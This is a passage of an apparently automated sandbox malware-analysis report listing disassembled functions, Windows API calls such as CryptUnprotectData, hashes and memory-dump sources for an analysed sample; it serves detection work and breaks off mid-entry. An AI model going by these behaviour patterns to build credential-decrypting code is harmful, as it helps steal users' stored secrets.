                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 3c47d20f9a9d3fff566e56ba9950d530bf7bf4d89183fc7a54620a71ef8fc8bc
                              • Instruction ID: 7c0073c246eb46356272bd38d3733eb9b9b2568e40a939e0b3599f39d454ebb0
                              • Opcode Fuzzy Hash: 3c47d20f9a9d3fff566e56ba9950d530bf7bf4d89183fc7a54620a71ef8fc8bc
                              • Instruction Fuzzy Hash: 8CF0A9B02543126BE7305F69AC89F977BA8AB04B51F250514FB45EE2D0D7B8DC40DAA4
                              Function 007CCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(007DB110,00000000,00000001,007DB100,?), ref: 007CCB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 007CCB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 007CCBC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: 6609b77731755bee1980bba81356011f912c5f3840f43fc012c62dec587c5503
                              • Instruction ID: 44a4a1531a31b9700e55fdd6cb821099e1d8f407914f3490c25184081c4face1
                              • Opcode Fuzzy Hash: 6609b77731755bee1980bba81356011f912c5f3840f43fc012c62dec587c5503
                              • Instruction Fuzzy Hash: 97317871A40219BFD710DB94CC82F9A77B9DB88B10F104188FA08EB2D0D7B5AD44CB90
                              Function 007B9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007B9B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007B9BB3
                              • LocalFree.KERNEL32(?), ref: 007B9BD7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 658bf4658ca4377d2c7632c2025e4c6279c29f1e2f115d08a2c1ba292668e43a
                              • Instruction ID: a84d16f8dedd422599b12bdb96735a57f919464b1cf0c1170a2b5310ef98bbf6
                              • Opcode Fuzzy Hash: 658bf4658ca4377d2c7632c2025e4c6279c29f1e2f115d08a2c1ba292668e43a
                              • Instruction Fuzzy Hash: 00011DB6E5520AABE710DBA4DC45FABB778EB44B01F104554EA04AB280D7B49E00CBE0
                              Function 00ADDE24 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _${y
                              • API String ID: 0-3116576199
                              • Opcode ID: 677fd9ae5c46a5c8ea44b8305fc7b706ce23cf49db3d6867c46c658672214ed6
                              • Instruction ID: 396423f9767da80bc7f0398b595430b49be6e3b9419182e1cdd1c517bd7df704
                              • Opcode Fuzzy Hash: 677fd9ae5c46a5c8ea44b8305fc7b706ce23cf49db3d6867c46c658672214ed6
                              • Instruction Fuzzy Hash: AB5110F35087049FE344AE29DD8637AFBE6EFD4320F1A892DD6C587744EA3858418686
                              Function 00B6F34D Relevance: 1.9, Strings: 1, Instructions: 623COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O6;
                              • API String ID: 0-3251865006
                              • Opcode ID: b52a3f8b904dbfcdb02cd9ceef17f76f12c1ac26112645d52fb4a5da5303b48c
                              • Instruction ID: b149870b10997c9ff4cf7b431798872188785d599e3a6a885fce65accc4f3a7c
                              • Opcode Fuzzy Hash: b52a3f8b904dbfcdb02cd9ceef17f76f12c1ac26112645d52fb4a5da5303b48c
                              • Instruction Fuzzy Hash: 8F122AF350C2049FE304AE2DEC8567ABBE9EBD4360F168A3DE9C4C7744E6359905C682
                              Function 00A507A2 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $9l^
                              • API String ID: 0-1614111026
                              • Opcode ID: fb013a84fd5a1fb5aa044262af0390ee0f013d68dab614657e88f3ce3e2c2c4e
                              • Instruction ID: abcd69be5278eb67c0c810b59d4d7b06ba3866e9ff1ae69b3df0d8cb320884a5
                              • Opcode Fuzzy Hash: fb013a84fd5a1fb5aa044262af0390ee0f013d68dab614657e88f3ce3e2c2c4e
                              • Instruction Fuzzy Hash: 2551A4F7E186009FE701AE2DDC8572AFBE5EF98314F1A493CDAC8D3344E53994148686
                              Function 00AA90F1 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =caO
                              • API String ID: 0-4078013694
                              • Opcode ID: ca278788e6b51008413f1020e88ed296ed670f7006e4a6b096bf102f534e12f8
                              • Instruction ID: 1dee47f347a09ad96755298ce10f4df9ec93f6f3cac160687c70528f858e54bb
                              • Opcode Fuzzy Hash: ca278788e6b51008413f1020e88ed296ed670f7006e4a6b096bf102f534e12f8
                              • Instruction Fuzzy Hash: A75149F3E092204BF3149919EC957B6BA96DFD4320F2B803DDB89977C4E979580683C2
                              Function 00B68855 Relevance: .5, Instructions: 498COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85463c47d1efaa75711b5035b94ba48b6019da2b9da08d818d296ff9fd9aaec4
                              • Instruction ID: 5c750d74acfae1614361e6a7ef2447761de7c39c429c02df51834eca69d6a948
                              • Opcode Fuzzy Hash: 85463c47d1efaa75711b5035b94ba48b6019da2b9da08d818d296ff9fd9aaec4
                              • Instruction Fuzzy Hash: 5CE1F7F350C2009FE7146E28EC91BBABBE9EF54720F16093DEAC4D3740E63598458697
                              Function 00B29570 Relevance: .2, Instructions: 216COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b1853b8358ca3ae9b0e71207bf4fff3c4c5dd2ce41343b041312422058092638
                              • Instruction ID: 8c822b2c58e1648e3857cfa2318a6fc11bd0fffedcc2cb8cf20c6d6e93f5170b
                              • Opcode Fuzzy Hash: b1853b8358ca3ae9b0e71207bf4fff3c4c5dd2ce41343b041312422058092638
                              • Instruction Fuzzy Hash: 2161E6B3A092109FE3045E29DC8136AF6D6EFD4320F2B493DDAC5D7784E97858058796
                              Function 00BF5897 Relevance: .2, Instructions: 168COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: efbbca511e1cbcdc6728d27edd35ee5136c403d784ff0648343560ae43176cf2
                              • Instruction ID: 1b1ae3782d6249616cb7f8d451376ce6013e96b5f7e14304211015816899e881
                              • Opcode Fuzzy Hash: efbbca511e1cbcdc6728d27edd35ee5136c403d784ff0648343560ae43176cf2
                              • Instruction Fuzzy Hash: F35125F39082046FE304AE29EC4177AB7EAEF94720F1A493DE6C4C7740E63598558793
                              Function 00ACAD5B Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23d6ae29e47a2278b65ab8f8dc5b549319a47fa9688eb22e86931567886bfe99
                              • Instruction ID: df0b46ca3eb9d003b4a5bc635eadc4a8d232036d3f6d5f405c79e5492742a81e
                              • Opcode Fuzzy Hash: 23d6ae29e47a2278b65ab8f8dc5b549319a47fa9688eb22e86931567886bfe99
                              • Instruction Fuzzy Hash: 3D41D3F3A186145BE314AA1CDC8577AB7D6EF94710F0A493CDBC4C7780E93DA8198686
                              Function 00E46000 Relevance: .1, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b4daad53d942201a209afb87794fa314599dfaad260d82dfcc24108f0fc8569
